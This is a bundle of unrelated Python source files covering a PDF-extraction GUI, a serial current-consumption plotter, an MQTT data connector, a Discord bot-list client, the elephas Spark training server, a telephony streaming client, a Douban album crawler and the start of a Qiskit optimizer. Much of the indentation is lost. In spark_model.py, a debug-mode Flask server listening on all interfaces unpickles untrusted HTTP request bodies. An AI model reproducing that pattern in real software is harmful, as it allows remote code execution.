("Comic Books", "*.cbz"),
("HTML", "*.htm*")
)
)
self.adobe_api_ent_single_val.set(pdf_file)
self.adobe_api_ent_multi_val.set("")
def generate_adobe_request(self):
"""Use multiprocessing to create Adobe API request."""
if self.adobe_api_ent_multi_val.get() == "" and self.adobe_api_ent_single_val.get() == "":
return
if self.adobe_api_ent_multi_val.get() == "":
self.send_adobe_request = partial(adobe_json.extract_pdf_adobe, source_path=self.adobe_api_ent_single_val.get())
self.adobe_process = multiprocessing.Process(target=self.send_adobe_request)
self.adobe_process.start()
self.adobe_api_progress_bar.start()
self.after(80, self.check_process, self.adobe_process, self.adobe_api_progress_bar)
# adobe_process.join()
        elif self.adobe_api_ent_single_val.get() == "":
            self.send_adobe_request = partial(adobe_json.extract_pdf_adobe, source_path=self.adobe_api_ent_multi_val.get())
            self.adobe_process = multiprocessing.Process(target=self.send_adobe_request)
            self.adobe_process.start()
            self.adobe_api_progress_bar.start()
            self.after(80, self.check_process, self.adobe_process, self.adobe_api_progress_bar)
def start_crawler(self):
"""Use multiprocessing to start the crawler."""
        if self.scrapy_download_domain_ent_val.get() == "" or self.scrapy_download_url_ent_val.get() == "":
return
self.crawler_partial = partial(download_pdfs.run_spider, start_url=self.scrapy_download_url_ent_val.get(), allowed_domain=self.scrapy_download_domain_ent_val.get())
self.crawler_process = multiprocessing.Process(target=self.crawler_partial)
self.crawler_process.start()
self.scrapy_download_progress_bar.start()
self.after(80, self.check_process, self.crawler_process, self.scrapy_download_progress_bar)
def check_process(self, process, progress_bar):
"""Checks if process has finished, if it has then it joins the process
and stops the progress bar."""
if (process.is_alive()):
self.after(80, self.check_process, process, progress_bar)
return
else:
try:
process.join()
progress_bar.stop()
logging.info("Process complete, exiting.")
except:
logging.exception("ERROR: Unable to stop process.")
# ------------------------------------------------------------------------------
# Run standalone.
# ------------------------------------------------------------------------------
# mainwindow = Tk()
# preview = ExtractPDF(mainwindow)
# preview.mainloop()
|
measure.py
|
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import re
import signal
import sys
import threading
import serial
from time import gmtime
from time import strftime
signal.signal(signal.SIGINT, lambda sig, frame: plt.close('all'))
readed_line_regex = re.compile(r'^(?P<time>[0-9.]+?) (?P<current>[0-9.]+?)( (?P<power>[0-9.]+?))?[\t\s\n]+$')
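# Example of a serial line this regex accepts (illustrative values):
#   "1523 12.34 40.7\n" -> time=1523 ms, current=12.34 mA, power=40.7 mW (the power field is optional)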
class TailSerial():
def __init__(self, serial, callback_line=sys.stdout.write):
self.serial = serial
self.callback_line = callback_line
def follow(self):
while True:
line = self.serial.readline()
try:
self.callback_line(line.decode("utf-8"))
except ValueError:
pass
class ElectricalCurrentChart():
def __init__(self, subplot=111):
figure = plt.figure(figsize=(12, 6), facecolor='#DEDEDE')
self.ax = figure.add_subplot(subplot)
self.time_data = []
self.current_data = []
self.power_data = []
self.reads = 0
self.milisseconds_at_begin = 0
self.max_current = 0
self.aggregated_current = 0
self.aggregated_power = 0
self.setup()
def append_data(self, milliseconds, current, power):
print([milliseconds, current, power])
self.reads += 1
if len(self.time_data) == 0:
self.milisseconds_at_begin = milliseconds
        # Avoid plotting more than two consecutive identical current readings
        if len(self.current_data) >= 2:
            if current == self.current_data[-1] and self.current_data[-1] == self.current_data[-2]:
                self.current_data.pop()
                self.time_data.pop()
                self.power_data.pop()
self.time_data.append(milliseconds - self.milisseconds_at_begin)
self.current_data.append(current)
self.power_data.append(power)
self.aggregated_power += power
self.aggregated_current += current
if (current > self.max_current):
self.max_current = current
def setup(self):
plt.cla()
self.ax.set_facecolor('#DEDEDE')
self.ax.set_xlabel('Milliseconds')
self.ax.set_ylabel('Current (mA)')
self.ax.set_title('Consumption\n')
def plot(self):
        # Plot only once every 100 reads
if (self.reads == 0 or self.reads % 100 != 0):
return
self.setup()
x_last = self.time_data[-1]
y_last = self.current_data[-1]
self.ax.plot(self.time_data, self.current_data)
self.ax.text(x_last, y_last, "{} mA".format(y_last))
self.ax.scatter(x_last, y_last)
avg_current = self.aggregated_current/len(self.current_data)
avg_power = self.aggregated_power/len(self.power_data)
        # time_data already stores elapsed milliseconds relative to the first sample
        elapsed_ms = self.time_data[-1]
        mWh = avg_power*elapsed_ms/(3.6*10**6)
        mAh = avg_current*elapsed_ms/(3.6*10**6)
        time_recording = strftime("%H:%M:%S", gmtime(elapsed_ms/1000))
label = f"Reads: {self.reads}\n"
label += f"Time recording: {time_recording}\n"
label += f"Avg current: {'{:.4f}'.format(round(avg_current, 4))} mA\n"
label += f"Max current: {'{:.4f}'.format(round(self.max_current, 4))} mA\n"
label += f"Consumption: {'{:.4f}'.format(round(mAh, 4))} mAh\n"
label += f"Avg Power: {'{:.4f}'.format(round(avg_power, 4))} mW\n"
label += f"Power: {'{:.4f}'.format(round(mWh, 4))} mWh"
plt.legend(handles=[mpatches.Patch(label=label)], loc="upper right")
plt.draw()
def append_line_in_chart(chart, line):
matches = readed_line_regex.match(line)
if not (matches):
return
chart.append_data(
int(matches.group('time')),
float(matches.group('current')),
float(matches.group('power'))
)
chart.plot()
def observe_serial(port, baudrate, on_new_line):
serial_port = serial.Serial(port, baudrate)
serial_port.close()
serial_port.open()
tail_serial = TailSerial(serial_port, on_new_line)
    serial_follow = threading.Thread(target=tail_serial.follow, daemon=True)
serial_follow.start()
if __name__ == "__main__":
if (len(sys.argv) <= 1):
print("\033[91m [FAIL] Missing serial port")
sys.exit(-1)
if (len(sys.argv) <= 2):
print(f"\033[91m [FAIL] Missing baudrate for port \"`{sys.argv[1]}`\"")
sys.exit(-1)
chart = ElectricalCurrentChart()
observe_serial(
sys.argv[1],
sys.argv[2],
lambda line: append_line_in_chart(chart, line))
plt.show()
sys.exit(0)
|
apiConnector.py
|
"""
Created on Mär 18 10:31 2019
@author: nishit
"""
import datetime
import time
import json
import threading
from abc import abstractmethod
from queue import Queue
from random import randrange
import requests
from senml import senml
from IO.MQTTClient import MQTTClient
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent()
class ApiConnector:
def __init__(self, url, config, house, name):
logger.info(":")
self.buffer = None
self.config = config
self.pub_prefix = config.get("IO", "pub.topic.prefix") + str(house) + "/"
self.name = name
self.url = url
self.q = Queue()
logger.info(url)
self.mqtt_client = self.init_mqtt()
self.topic = config.get(house, "url.topic", fallback=None)
self.topic = self.pub_prefix + self.topic
self.publish_freq = int(config.get(house, "pub.freq", fallback=600))
self.data_thread = threading.Thread(target=self.fetch_data, args=(self.q, 23, 30))
self.data_thread.start()
self.publish_thread = threading.Thread(target=self.publish_data, args=(self.q, self.publish_freq))
self.publish_thread.start()
def fetch_data_api(self):
try:
logger.debug(self.url)
data = requests.get(self.url)
if data:
data = data.json()
return data
else:
return None
except Exception as e:
logger.error(str(e))
return None
@abstractmethod
def update_url(self):
pass
@abstractmethod
def extract_data(self, raw_data):
pass
def init_mqtt(self):
try:
if "pub.mqtt.host" in dict(self.config.items("IO")):
host = self.config.get("IO", "pub.mqtt.host")
else:
host = self.config.get("IO", "mqtt.host")
port = self.config.get("IO", "mqtt.port")
client_id = "client_publish" + str(randrange(100000)) + str(time.time()).replace(".", "")
mqtt = MQTTClient(str(host), port, client_id,
username=self.config.get("IO", "mqtt.username", fallback=None),
password=self.config.get("IO", "mqtt.password", fallback=None),
ca_cert_path=self.config.get("IO", "mqtt.ca.cert.path", fallback=None),
set_insecure=bool(self.config.get("IO", "mqtt.insecure.flag", fallback=False)))
return mqtt
except Exception as e:
logger.error(e)
raise e
def to_senml(self, t, v, u, n):
meas = senml.SenMLMeasurement()
meas.time = int(t)
meas.value = v
meas.unit = u
meas.name = n
return meas
def get_delay_time(self, hour, min):
date = datetime.datetime.now()
requestedTime = datetime.datetime(date.year, date.month, date.day, hour, min, 0)
if requestedTime < date:
requestedTime = requestedTime + datetime.timedelta(days=1)
return requestedTime.timestamp() - date.timestamp()
def fetch_data(self, q, hr, min):
"""Data fetch thread. Runs at 22:30 every day"""
while True:
try:
self.update_url()
data = self.fetch_data_api()
if data is not None:
data_list = self.extract_data(data)
meas_list = []
for row in data_list:
meas = self.to_senml(row[0], row[1], row[2], self.name)
meas_list.append(meas)
logger.info("length of data = "+str(len(meas_list)))
doc = senml.SenMLDocument(meas_list)
json_data = doc.to_json()
json_data = json.dumps(json_data)
q.put(json_data)
delay = self.get_delay_time(hr, min)
time.sleep(delay)
except Exception as e:
logger.error(e)
time.sleep(10)
def publish_data(self, q, frequency):
while True:
start_time = time.time()
try:
if not q.empty():
data = q.get()
self.buffer = data
q.task_done()
except Exception as e:
logger.error("q read error "+ str(e))
time.sleep(10)
try:
if self.buffer:
self.mqtt_client.publish(topic=self.topic, message=self.buffer, waitForAck=True, qos=1)
logger.debug("Results published on this topic: " + self.topic)
delay_time = frequency - (time.time() - start_time)
if delay_time > 0:
time.sleep(delay_time)
except Exception as e:
logger.error("Error pub data "+str(e))
time.sleep(10)
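# Illustrative sketch only: ApiConnector is abstract, so a caller is expected to
# subclass it and implement update_url() and extract_data(). The class name,
# URL, section name and unit below are assumptions, not part of this module.
# class WeatherApiConnector(ApiConnector):
#     def update_url(self):
#         # Rebuild self.url here if it embeds e.g. the current date.
#         pass
#     def extract_data(self, raw_data):
#         # Must return rows of [timestamp, value, unit], as consumed by to_senml().
#         return [[row["time"], row["value"], "W"] for row in raw_data.get("data", [])]
#
# connector = WeatherApiConnector("https://api.example.com/forecast", config, "house1", "pv_forecast")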
|
__init__.py
|
import requests, threading, asyncio
class Threads:
def newThread(function, args=()):
        new_thread = threading.Thread(target=function, args=args)  # TODO: add error handling so thread exceptions are written to a log file
new_thread.start()
return new_thread
    def postGuildCount(guild_count: str, token: str, threaded=True):  # runs in the background when threaded=True, since the API can be slow (posts took ~1-2 minutes during testing)
def main(guild_count, token):
url = "https://townlist.xyz/api/bots/stats" # townlist.xyz listing.discordtownshop.com
headers = {"serverCount": guild_count,"Content-Type": "application/json","Authorization": token}
requests.post(url, headers=headers)
if threaded:
Threads.newThread(lambda: main(guild_count, token))
else:
main(guild_count, token)
async def asyncRequest(url: str, method=requests.get):
loop = asyncio.get_event_loop()
future_object = loop.run_in_executor(None, method, url)
response = await future_object
return response
async def returnBotData(bot_id: str):
response = await asyncRequest("https://townlist.xyz/api/bots/{0}".format(bot_id))
return response.json()
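# Illustrative usage sketch; the guild count, token and bot id are placeholders.
# Threads.postGuildCount(guild_count="42", token="YOUR_TOKEN", threaded=True)
# bot_data = asyncio.get_event_loop().run_until_complete(Threads.returnBotData("123456789012345678"))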
|
spark_model.py
|
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
from itertools import tee
import socket
from multiprocessing import Process
import six.moves.cPickle as pickle
from six.moves import range
from flask import Flask, request
try:
import urllib.request as urllib2
except ImportError:
import urllib2
from pyspark.mllib.linalg import Matrix, Vector
from .utils.rwlock import RWLock
from .utils.functional_utils import subtract_params
from .utils.rdd_utils import lp_to_simple_rdd
from .mllib.adapter import to_matrix, from_matrix, to_vector, from_vector
from .optimizers import SGD as default_optimizer
from keras.models import model_from_yaml
def get_server_weights(master_url='localhost:5000'):
'''
Retrieve master weights from parameter server
'''
request = urllib2.Request('http://{0}/parameters'.format(master_url),
headers={'Content-Type': 'application/elephas'})
ret = urllib2.urlopen(request).read()
weights = pickle.loads(ret)
return weights
def put_deltas_to_server(delta, master_url='localhost:5000'):
'''
Update master parameters with deltas from training process
'''
request = urllib2.Request('http://{0}/update'.format(master_url),
pickle.dumps(delta, -1), headers={'Content-Type': 'application/elephas'})
return urllib2.urlopen(request).read()
class SparkModel(object):
'''
SparkModel is the main abstraction of elephas. Every other model
should inherit from it.
'''
def __init__(self, sc, master_network, optimizer=None, mode='asynchronous', frequency='epoch',
num_workers=4,
master_optimizer="adam",
master_loss="categorical_crossentropy",
master_metrics=None,
custom_objects=None,
*args, **kwargs):
self.spark_context = sc
self._master_network = master_network
if custom_objects is None:
custom_objects = {}
if master_metrics is None:
master_metrics = ["accuracy"]
if optimizer is None:
self.optimizer = default_optimizer()
else:
self.optimizer = optimizer
self.mode = mode
self.frequency = frequency
self.num_workers = num_workers
self.weights = master_network.get_weights()
self.pickled_weights = None
self.lock = RWLock()
self.master_optimizer = master_optimizer
self.master_loss = master_loss
self.master_metrics = master_metrics
self.custom_objects = custom_objects
@staticmethod
def determine_master():
'''
Get URL of parameter server, running on master
'''
master_url = socket.gethostbyname(socket.gethostname()) + ':5000'
return master_url
def get_train_config(self, nb_epoch, batch_size,
verbose, validation_split):
'''
Get configuration of training parameters
'''
train_config = {}
train_config['nb_epoch'] = nb_epoch
train_config['batch_size'] = batch_size
train_config['verbose'] = verbose
train_config['validation_split'] = validation_split
return train_config
def get_config(self):
'''
Get configuration of model parameters
'''
model_config = {}
model_config['model'] = self.master_network.get_config()
model_config['optimizer'] = self.optimizer.get_config()
model_config['mode'] = self.mode
return model_config
@property
def master_network(self):
''' Get master network '''
return self._master_network
@master_network.setter
def master_network(self, network):
''' Set master network '''
self._master_network = network
def start_server(self):
''' Start parameter server'''
self.server = Process(target=self.start_service)
self.server.start()
def stop_server(self):
''' Terminate parameter server'''
self.server.terminate()
self.server.join()
def start_service(self):
''' Define service and run flask app'''
app = Flask(__name__)
self.app = app
@app.route('/')
def home():
return 'Elephas'
@app.route('/parameters', methods=['GET'])
def get_parameters():
if self.mode == 'asynchronous':
self.lock.acquire_read()
self.pickled_weights = pickle.dumps(self.weights, -1)
pickled_weights = self.pickled_weights
if self.mode == 'asynchronous':
self.lock.release()
return pickled_weights
@app.route('/update', methods=['POST'])
def update_parameters():
delta = pickle.loads(request.data)
if self.mode == 'asynchronous':
self.lock.acquire_write()
if not self.master_network.built:
self.master_network.build()
base_constraint = lambda a: a
constraints = [base_constraint for x in self.weights]
self.weights = self.optimizer.get_updates(self.weights, constraints, delta)
if self.mode == 'asynchronous':
self.lock.release()
return 'Update done'
self.app.run(host='0.0.0.0', debug=True,
threaded=True, use_reloader=False)
def predict(self, data):
'''
Get prediction probabilities for a numpy array of features
'''
return self.master_network.predict(data)
def predict_classes(self, data):
'''
Predict classes for a numpy array of features
'''
return self.master_network.predict_classes(data)
def train(self, rdd, nb_epoch=10, batch_size=32,
verbose=0, validation_split=0.1):
'''
Train an elephas model.
'''
rdd = rdd.repartition(self.num_workers)
master_url = self.determine_master()
if self.mode in ['asynchronous', 'synchronous', 'hogwild']:
self._train(rdd, nb_epoch, batch_size, verbose, validation_split, master_url)
else:
print("""Choose from one of the modes: asynchronous, synchronous or hogwild""")
def _train(self, rdd, nb_epoch=10, batch_size=32, verbose=0,
validation_split=0.1, master_url='localhost:5000'):
'''
Protected train method to make wrapping of modes easier
'''
self.master_network.compile(optimizer=self.master_optimizer, loss=self.master_loss, metrics=self.master_metrics)
if self.mode in ['asynchronous', 'hogwild']:
self.start_server()
yaml = self.master_network.to_yaml()
train_config = self.get_train_config(nb_epoch, batch_size,
verbose, validation_split)
if self.mode in ['asynchronous', 'hogwild']:
worker = AsynchronousSparkWorker(
yaml, train_config, self.frequency, master_url,
self.master_optimizer, self.master_loss, self.master_metrics, self.custom_objects
)
rdd.mapPartitions(worker.train).collect()
new_parameters = get_server_weights(master_url)
elif self.mode == 'synchronous':
init = self.master_network.get_weights()
parameters = self.spark_context.broadcast(init)
            worker = SparkWorker(yaml, parameters, train_config,
                                 self.master_optimizer, self.master_loss, self.master_metrics, self.custom_objects)
deltas = rdd.mapPartitions(worker.train).collect()
new_parameters = self.master_network.get_weights()
for delta in deltas:
constraints = self.master_network.constraints
new_parameters = self.optimizer.get_updates(self.weights, constraints, delta)
self.master_network.set_weights(new_parameters)
if self.mode in ['asynchronous', 'hogwild']:
self.stop_server()
class SparkWorker(object):
'''
Synchronous Spark worker. This code will be executed on workers.
'''
def __init__(self, yaml, parameters, train_config, master_optimizer, master_loss, master_metrics, custom_objects):
self.yaml = yaml
self.parameters = parameters
self.train_config = train_config
self.master_optimizer = master_optimizer
self.master_loss = master_loss
self.master_metrics = master_metrics
self.custom_objects = custom_objects
def train(self, data_iterator):
'''
Train a keras model on a worker
'''
feature_iterator, label_iterator = tee(data_iterator, 2)
x_train = np.asarray([x for x, y in feature_iterator])
y_train = np.asarray([y for x, y in label_iterator])
model = model_from_yaml(self.yaml, self.custom_objects)
model.compile(optimizer=self.master_optimizer, loss=self.master_loss, metrics=self.master_metrics)
model.set_weights(self.parameters.value)
weights_before_training = model.get_weights()
if x_train.shape[0] > self.train_config.get('batch_size'):
model.fit(x_train, y_train, **self.train_config)
weights_after_training = model.get_weights()
deltas = subtract_params(weights_before_training, weights_after_training)
yield deltas
class AsynchronousSparkWorker(object):
'''
Asynchronous Spark worker. This code will be executed on workers.
'''
def __init__(self, yaml, train_config, frequency, master_url, master_optimizer, master_loss, master_metrics, custom_objects):
self.yaml = yaml
self.train_config = train_config
self.frequency = frequency
self.master_url = master_url
self.master_optimizer = master_optimizer
self.master_loss = master_loss
self.master_metrics = master_metrics
self.custom_objects = custom_objects
def train(self, data_iterator):
'''
Train a keras model on a worker and send asynchronous updates
to parameter server
'''
feature_iterator, label_iterator = tee(data_iterator, 2)
x_train = np.asarray([x for x, y in feature_iterator])
y_train = np.asarray([y for x, y in label_iterator])
if x_train.size == 0:
return
model = model_from_yaml(self.yaml, self.custom_objects)
model.compile(optimizer=self.master_optimizer, loss=self.master_loss, metrics=self.master_metrics)
nb_epoch = self.train_config['nb_epoch']
batch_size = self.train_config.get('batch_size')
nb_train_sample = x_train.shape[0]
nb_batch = int(np.ceil(nb_train_sample/float(batch_size)))
index_array = np.arange(nb_train_sample)
batches = [(i*batch_size, min(nb_train_sample, (i+1)*batch_size)) for i in range(0, nb_batch)]
if self.frequency == 'epoch':
for epoch in range(nb_epoch):
weights_before_training = get_server_weights(self.master_url)
model.set_weights(weights_before_training)
self.train_config['epochs'] = 1
if x_train.shape[0] > batch_size:
model.fit(x_train, y_train, **self.train_config)
weights_after_training = model.get_weights()
deltas = subtract_params(weights_before_training, weights_after_training)
put_deltas_to_server(deltas, self.master_url)
elif self.frequency == 'batch':
from keras.engine.training import slice_X
for epoch in range(nb_epoch):
if x_train.shape[0] > batch_size:
for (batch_start, batch_end) in batches:
weights_before_training = get_server_weights(self.master_url)
model.set_weights(weights_before_training)
batch_ids = index_array[batch_start:batch_end]
X = slice_X(x_train, batch_ids)
y = slice_X(y_train, batch_ids)
model.train_on_batch(X, y)
weights_after_training = model.get_weights()
deltas = subtract_params(weights_before_training, weights_after_training)
put_deltas_to_server(deltas, self.master_url)
else:
print('Choose frequency to be either batch or epoch')
yield []
class SparkMLlibModel(SparkModel):
'''
MLlib model takes RDDs of LabeledPoints. Internally we just convert
back to plain old pair RDDs and continue as in SparkModel
'''
def __init__(self, sc, master_network, optimizer=None, mode='asynchronous', frequency='epoch', num_workers=4,
master_optimizer="adam",
master_loss="categorical_crossentropy",
master_metrics=None,
custom_objects=None):
SparkModel.__init__(self, sc, master_network, optimizer, mode, frequency, num_workers,
master_optimizer=master_optimizer, master_loss=master_loss, master_metrics=master_metrics,
custom_objects=custom_objects)
def train(self, labeled_points, nb_epoch=10, batch_size=32, verbose=0, validation_split=0.1,
categorical=False, nb_classes=None):
'''
Train an elephas model on an RDD of LabeledPoints
'''
rdd = lp_to_simple_rdd(labeled_points, categorical, nb_classes)
rdd = rdd.repartition(self.num_workers)
self._train(rdd, nb_epoch, batch_size, verbose, validation_split)
def predict(self, mllib_data):
'''
Predict probabilities for an RDD of features
'''
if isinstance(mllib_data, Matrix):
return to_matrix(self.master_network.predict(from_matrix(mllib_data)))
elif isinstance(mllib_data, Vector):
return to_vector(self.master_network.predict(from_vector(mllib_data)))
else:
print('Provide either an MLLib matrix or vector')
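# Illustrative usage sketch (placeholder names): assumes an existing SparkContext
# `sc`, a Keras model `model` and an RDD of (features, label) pairs `rdd`.
# spark_model = SparkModel(sc, model, mode='asynchronous', frequency='epoch', num_workers=4)
# spark_model.train(rdd, nb_epoch=10, batch_size=32, verbose=0, validation_split=0.1)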
|
__init__.py
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# nimvelo/stream/__init__.py
# Python 2.7 client library for the Nimvelo/Sipcentric API
# Copyright (c) 2015 Sipcentric Ltd. Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
import multiprocessing
import requests
import time
import logging
import simplejson as json
logger = logging.getLogger(__name__)
class Stream(object):
'''Allows you to connect to the Nimvelo (Sipcentric) streaming API
and register callbacks to your own functions.
'''
def __init__(self, parent):
self.parent = parent
self.process = multiprocessing.Process(target=self.__run)
self.username = self.parent.username # Account username
self.password = self.parent.password # Account password
self.base = self.parent.base + '/stream' # Base streaming URL (default: https://pbx.sipcentric.com/api/v1/stream)
self.heartbeat = None
self.eventsCallback = None
self.incomingcallCallback = None
self.smsreceivedCallback = None
    def __process(self, event):
event = json.loads(event)
logger.info('Processing event')
logger.debug(event)
if event['event'] == 'heartbeat':
self.heartbeat = time.time()
return True
elif event['event'] == 'incomingcall':
if self.incomingcallCallback:
self.incomingcallCallback(event['values'])
return True
elif event['event'] == 'smsreceived':
if self.smsreceivedCallback:
self.smsreceivedCallback(event['values'])
return True
if self.eventsCallback:
self.eventsCallback(event)
return True
def __run(self):
stream = '' # Used as a buffer for the stream data
data = False # Data is not JSON until we detect it
level = 0 # JSON object depth
r = requests.get(self.base, verify=True, auth=(self.username, self.password), stream=True)
for i in r.iter_content():
if i == '{':
stream += i
level += 1
data = True
elif i == '}':
stream += i
data = False
level -= 1
if level <= 0:
                    self.__process(stream)
stream = ''
elif data is True:
stream += i
def register(self, type, callback):
# Register a function to a callback in the class
if type == 'incomingcall':
self.incomingcallCallback = callback
elif type == 'smsreceived':
self.smsreceivedCallback = callback
elif type == 'events':
self.eventsCallback = callback
logger.info('Callback registered')
def connect(self):
# Start multiprocessing thread
self.process.start()
logger.info('Connected')
def disconnect(self):
# Terminate multiprocessing thread
self.process.terminate()
logger.info('Disconnected')
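# Illustrative usage sketch: `api` stands for the parent client object that
# provides username, password and base URL (a placeholder name here).
# def on_call(values):
#     print values
# stream = Stream(api)
# stream.register('incomingcall', on_call)
# stream.connect()
# ... later ...
# stream.disconnect()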
|
Crawler_album_douban.py
|
#coding:utf-8
from __future__ import print_function
from bs4 import BeautifulSoup
import multiprocessing
import urllib
import re
import os
import time
def Filter_input(inputlist):
charlist = set(inputlist.split())
numlist = []
def is_number(char):
try:
int(char)
return True
except ValueError:
return False
for i in charlist:
if is_number(i):
num = int(i)
numlist.append(num)
count = len(numlist)
return numlist
def getHtml(url):
page = urllib.urlopen(url)
html = page.read()
return html
def EnterPhotos(url):
people_reg = r'https://www.douban.com/people/.+?/$'
people_url = re.compile(people_reg)
photo_reg = r'https://www.douban.com/people/.+?/.+?'
photo_url = re.compile(photo_reg)
if re.match(people_reg,url):
URL = url + 'photos'
print("正在寻找相册并打开...")
return URL
elif re.match(photo_url,url):
print("正在寻找专辑...")
return url
else:
print("你输入的链接不符合规则,请重新输入!")
return False
def getAllAlbumPagesUrl(url):
html = getHtml(url)
Soup = BeautifulSoup(html, 'lxml')
pageNumber = len(AllAlbumPageUrlList)
nextpagetags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.paginator > span.next > a')
# print(nextpagetags)
if nextpagetags:
if not AllAlbumPageUrlList:
AllAlbumPageUrlList.append(url)
nextpageurl = nextpagetags[0].get('href')
AllAlbumPageUrlList.append(nextpageurl)
getAllAlbumPagesUrl(nextpageurl)
else:
if AllAlbumPageUrlList:
print("一共%d页" % pageNumber)
else:
albumtags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div > div > a')
if albumtags:
AllAlbumPageUrlList.append(url)
# print("一共1页",AllAlbumPageUrlList)
else:
print("这里没有上传过任何照片")
class GetAlbum(object):
"""docstring for GetAlbum"""
def __init__(self, url, pagenumber):
super(GetAlbum, self).__init__()
self.url = url
self.html = getHtml(url)
self.pagenumber = pagenumber
def getAlbum(self):
Soup = BeautifulSoup(self.html, 'lxml')
data = {}
count = 0
# print Soup
imagetags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.wr > div > div > div.pl2 > a')
picnumbertags = Soup.select('#content > div.grid-16-8.clearfix > div.article > div.wr > div > div > span')
for albumhref, albumname, picnumber in zip(imagetags,imagetags,picnumbertags):
count += 1
number = self.pagenumber * 16 + count
data = {
'albumnumb':number,
'albumhref':albumhref.get('href'),
'albumname':albumname.get_text(),
'picnumber':picnumber.get_text()
}
print("------------------------------------------------",
"相册%d" % data['albumnumb'],data['albumname'],data['picnumber'],data['albumhref'],sep='\n')
AllAlbumInfoList.append(data)
def SelectAlbum(select_album_number, album_number):
if select_album_number in range(1,album_number+1):
for i in AllAlbumInfoList:
if i['albumnumb'] == select_album_number:
select_album_url = i['albumhref']
select_album_name = i['albumname']
# print(select_album_number,select_album_name,select_album_url)
return select_album_number,select_album_name,select_album_url
else:
return False
class multiProcess(multiprocessing.Process):
"""docstring for multiProcess"""
def __init__(self, func, arg, worknum):
super(multiProcess, self).__init__()
self.func = func
self.arg = arg
self.worknum = worknum
def works(self):
proc_record = []
for i in range(self.worknum):
p = multiprocessing.Process(target = self.func, args = (i,))
p.daemon = True
p.start()
proc_record.append(p)
for p in proc_record:
p.join()
if __name__ == '__main__':
t0 = time.time()
url = "https://www.douban.com/people/63226581/photos"
# url = "https://www.douban.com/people/58175165/"
# url = "https://www.douban.com/people/148026269/"
URL = EnterPhotos(url)
print(URL)
global AllAlbumPageUrlList
AllAlbumPageUrlList = []
global AllAlbumInfoList
AllAlbumInfoList = []
getAllAlbumPagesUrl(URL)
AlbumPageNumber = len(AllAlbumPageUrlList)
for i in range(AlbumPageNumber):
page_url = AllAlbumPageUrlList[i]
getAlbum = GetAlbum(page_url, i)
getAlbum.getAlbum()
AlbumNumber = len(AllAlbumInfoList)
chose_quit = 'Y'
while not chose_quit == 'N':
        correctFlag = False # flag marking that a valid album number has been entered
while (not correctFlag) and (not AlbumNumber == 0):
print("\n下载所有相册请直接输入数字'0'")
inputlist = raw_input("请输入你要下载的相册序号:")
Numlist = Filter_input(inputlist)
if Numlist and Numlist[0] == 0:
                # Download all albums
                print("Downloading all albums, please be patient...")
for i in range(1,AlbumNumber+1):
select_album_number = i
AlbumInfo = SelectAlbum(select_album_number, AlbumNumber)
SelectAlbum_name = AlbumInfo[1]
SelectAlbum_url = AlbumInfo[2]
print(select_album_number, SelectAlbum_name, SelectAlbum_url)
correctFlag = True
                # Download all albums
else:
                # Download albums selected by number
for i in Numlist:
select_album_number = i
AlbumInfo = SelectAlbum(select_album_number, AlbumNumber)
if AlbumInfo:
SelectAlbum_name = AlbumInfo[1]
SelectAlbum_url = AlbumInfo[2]
print(select_album_number,SelectAlbum_name,SelectAlbum_url)
correctFlag = True
                # Download albums selected by number
        chose_quit = raw_input('\nPress [Y] to continue selecting downloads, or [N] to quit: ')
print(time.time()- t0)
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
from typing import Optional
import multiprocessing
import platform
import logging
import numpy as np
from scipy import optimize as sciopt
from qiskit.aqua import aqua_globals
from qiskit.aqua.utils.validation import validate_min
from .optimizer import Optimizer, OptimizerSupportLevel
logger = logging.getLogger(__name__)
class P_BFGS(Optimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ['maxfun', 'factr', 'iprint']
# pylint: disable=unused-argument
def __init__(self,
maxfun: int = 1000,
factr: float = 10,
iprint: int = -1,
max_processes: Optional[int] = None) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
factr : The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
"""
if max_processes:
validate_min('max_processes', max_processes, 1)
super().__init__()
for k, v in list(locals().items()):
if k in self._OPTIONS:
self._options[k] = v
self._max_processes = max_processes
def get_support_level(self):
""" return support level dictionary """
return {
'gradient': OptimizerSupportLevel.supported,
'bounds': OptimizerSupportLevel.supported,
'initial_point': OptimizerSupportLevel.required
}
def optimize(self, num_vars, objective_function, gradient_function=None,
variable_bounds=None, initial_point=None):
num_procs = multiprocessing.cpu_count() - 1
num_procs = \
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == 'Darwin':
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
